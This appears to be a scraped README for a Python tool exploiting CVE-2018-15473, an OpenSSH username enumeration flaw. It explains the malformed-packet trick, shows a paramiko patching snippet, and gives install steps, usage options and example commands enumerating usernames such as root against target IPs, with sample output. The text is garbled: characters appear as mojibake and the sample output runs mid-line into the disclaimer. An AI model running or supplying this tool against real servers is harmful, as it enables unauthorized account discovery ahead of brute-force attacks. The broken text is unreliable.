## https://sploitus.com/exploit?id=FEF0EB06-770B-5ADF-857C-1704B7AC3FE4
# CVE-2018-15473 โ SSH Username Enumeration Tool
> A Python 3 reimplementation of the classic CVE-2018-15473 OpenSSH user enumeration exploit, extended with multi-threading, wordlist support, automatic vulnerability detection, and thread-safe exploit patching.
---
## Table of Contents
- [About the Vulnerability](#about-the-vulnerability)
- [How the Exploit Works](#how-the-exploit-works)
- [Features](#features)
- [Requirements](#requirements)
- [Installation](#installation)
- [Usage](#usage)
- [Examples](#examples)
- [Credits & Original Research](#credits--original-research)
- [Disclaimer](#disclaimer)
---
## About the Vulnerability
**CVE-2018-15473** is a user enumeration vulnerability affecting OpenSSH versions **2.3 through 7.7**.
The vulnerability arises from a subtle difference in how the OpenSSH server responds to authentication attempts for **valid** vs **invalid** usernames. By crafting a malformed public-key authentication packet, an attacker can observe the server's behavior and determine whether a given username exists on the system โ without needing to know the user's password.
This information can be a critical first step in a targeted brute-force or credential-stuffing attack.
| Detail | Value |
|---|---|
| CVE ID | CVE-2018-15473 |
| Affected Versions | OpenSSH 2.3 โ 7.7 |
| CVSS Score | 5.3 (Medium) |
| Type | Information Disclosure / User Enumeration |
| Authentication Required | No |
---
## How the Exploit Works
OpenSSH's authentication flow normally works like this:
```
Client โ MSG_SERVICE_REQUEST โ Server
Client โ MSG_SERVICE_ACCEPT โ Server
Client โ MSG_USERAUTH_REQUEST โ Server
Client โ MSG_USERAUTH_FAILURE or MSG_USERAUTH_SUCCESS โ Server
```
The exploit abuses the `MSG_SERVICE_ACCEPT` stage. When the server sends back a `MSG_SERVICE_ACCEPT`, the client is supposed to append a boolean field to the subsequent `MSG_USERAUTH_REQUEST` packet. By **patching paramiko's `Message.add_boolean` method to a no-op**, the tool sends a **malformed/truncated auth packet**.
The OpenSSH server then behaves differently depending on whether the username exists:
- **Invalid username** โ Server rejects with `MSG_USERAUTH_FAILURE` immediately (username doesn't exist, no point checking the key)
- **Valid username** โ Server raises an `AuthenticationException` (it tried to verify the key, confirming the user exists)
This tool intercepts those two responses via patched paramiko handlers (`_parse_userauth_failure` and `_parse_service_accept`) and classifies each username accordingly.
### Thread-Safety Fix
The original PoC patches `add_boolean` **permanently**, which causes a race condition when multiple threads run simultaneously โ threads interfere with each other's handshakes, producing false `SSH negotiation failed` errors. This reimplementation wraps the patch in a `threading.Lock()`, making the swap atomic:
```python
with _patch_lock:
real_add_boolean = paramiko.message.Message.add_boolean
paramiko.message.Message.add_boolean = _add_boolean_noop
try:
result = original_service_accept(auth_handler, m)
finally:
paramiko.message.Message.add_boolean = real_add_boolean
```
---
## Features
- **Single username check** โ quick one-shot mode
- **Wordlist mode** โ enumerate a full list of usernames
- **Multi-threaded** โ configurable thread count, all thread-safe
- **Auto vulnerability detection** โ uses `nmap` to verify the target is running a vulnerable OpenSSH version before scanning
- **Deduplication** โ removes duplicate usernames from wordlists automatically
- **Clean output** โ color-coded results with a summary report
---
## Requirements
- Python 3.8+
- `paramiko`
- `python-nmap`
- `nmap` (system binary, must be installed)
---
## Installation
```bash
git clone https://github.com/yourusername/CVE-2018-15473.git
cd CVE-2018-15473
# Create and activate a virtual environment (recommended)
python3 -m venv venv
source venv/bin/activate
# Install dependencies
pip install paramiko python-nmap
```
Make sure `nmap` is installed on your system:
```bash
# Debian/Ubuntu/Kali
sudo apt install nmap
```
---
## Usage
```
usage: main.py [-h] [-p PORT] [-t THREADS] (-u USERNAME | -U WORDLIST) target
positional arguments:
target Target IP address
options:
-h, --help show this help message and exit
-p, --port PORT SSH port (default: 22)
-t, --threads THREADS Threads for wordlist mode (default: 3)
-u USERNAME Single username to check
-U WORDLIST Path to wordlist file
```
---
## Examples
**Check a single username:**
```bash
python main.py 192.168.1.10 -u root
```
**Enumerate a wordlist with default threads:**
```bash
python main.py 192.168.1.10 -U /usr/share/wordlists/users.txt
```
**Enumerate with a custom thread count and port:**
```bash
python main.py 192.168.1.10 -U users.txt -t 10 -p 2222
```
**Sample output:**
```
[*] Scanning 192.168.56.109:22 ...
[*] Target running OpenSSH version: 4.7
[+] Target is VULNERABLE to CVE-2018-15473
[*] Loaded : 12 usernames (0 duplicate(s) removed โ 12 unique)
[*] Target : 192.168.56.109:22
[*] Threads : 10
[+] root This tool is intended **for educational purposes and authorized penetration testing only**.
> Using this tool against systems you do not own or have explicit written permission to test is **illegal** and **unethical**.
> The author takes no responsibility for any misuse of this software.
> Always practice responsible disclosure.